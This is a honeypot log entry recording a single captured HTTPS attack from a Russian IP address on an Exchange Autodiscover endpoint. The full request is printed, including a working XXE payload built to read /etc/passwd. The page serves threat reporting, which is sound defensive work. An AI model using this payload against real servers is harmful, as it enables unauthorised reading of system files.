Time | 2022/06/14, 23:55:56 (GMT) |
Transaction ID | BTL5EYU0UUCMMZ5X |
Service | https |
Location | RU (Russia) |
Attacker | 185.7.214.104 |
Classification | Web script control |
Harm Potential | Medium |
POST /Autodiscover/Autodiscover.xml HTTP/1.1 Host: ***.***.***.***:8443 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Length: 314 Content-Type: application/xml Accept-Encoding: gzip Connection: close <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"> <Request> <EMailAddress>aaaaa</EMailAddress> <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema> </Request> </Autodiscover>
All details are coming from honeypot central database.
Please share your wishes, opinions and suggestions with us: Honeypots.tk Admin |
If you like, you can support |